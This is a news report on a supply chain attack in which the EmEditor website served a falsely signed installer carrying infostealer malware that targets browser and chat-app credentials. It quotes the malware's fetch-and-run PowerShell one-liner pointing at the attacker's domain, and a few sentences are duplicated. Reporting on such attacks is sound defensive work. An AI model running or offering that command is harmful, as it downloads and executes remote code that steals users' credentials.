EmEditor Editor Website Hacked to Deliver Infostealer Malware in Supply Chain Attack
A recent supply chain attack on EmEditor, a prominent text editor software, has resulted in the distribution of infostealer malware, impacting millions of users globally.
A recent supply chain attack on EmEditor, a prominent text editor software, has resulted in the distribution of infostealer malware, impacting millions of users globally.
During the period from December 19 to December 22, 2025, the EmEditor website was compromised, leading to the download of malicious installer files instead of legitimate software, affecting developers, system administrators, and technical professionals worldwide.
Users who downloaded version 25.4.3 via the Download Now button were impacted by this breach. The attackers manipulated the URL settings to redirect users to a malicious version hosted on EmEditor's WordPress content directory.
The installer was falsely signed by "WALSHAM INVESTMENTS LIMITED," not the legitimate creator, Emurasoft Inc. This misleading signature added a deceptive facade of authenticity.
Qianxin analysts conducted a forensic examination and uncovered an information-stealing payload within the installation package. This malware replicates legitimate functionalities of EmEditor, allowing it to operate stealthily while collecting sensitive user data.
Users who downloaded version 25.4.3 via the Download Now button were impacted by this breach.
The malware's infection mechanism involves an embedded VBScript executing a PowerShell command: powershell.exe "irm emeditorjp.com | iex" . This command downloads and executes malicious code in memory, bypassing file-based detection.
The payload extracts credentials from web browsers such as Chrome, Edge, Brave, and Opera, and from productivity applications like Discord, Slack, Zoom, Microsoft Teams, WinSCP, and PuTTY, posing a significant threat to enterprise users handling sensitive communications and infrastructure access.
The malware sustains persistence via a malicious browser extension named "Google Drive Caching," enabling unauthorized access post-infection. This extension utilizes Domain Generation Algorithm capabilities to maintain resilient command-and-control communications.
Furthermore, the extension can steal Facebook advertising account credentials, monitor clipboard activities for cryptocurrency address replacement, and execute remote commands to extract additional data or influence browser behavior.
It is recommended that affected users disconnect compromised systems immediately, conduct thorough malware scans, and reset all credentials used on the impacted devices.
Based on reporting by Cyber Security News.
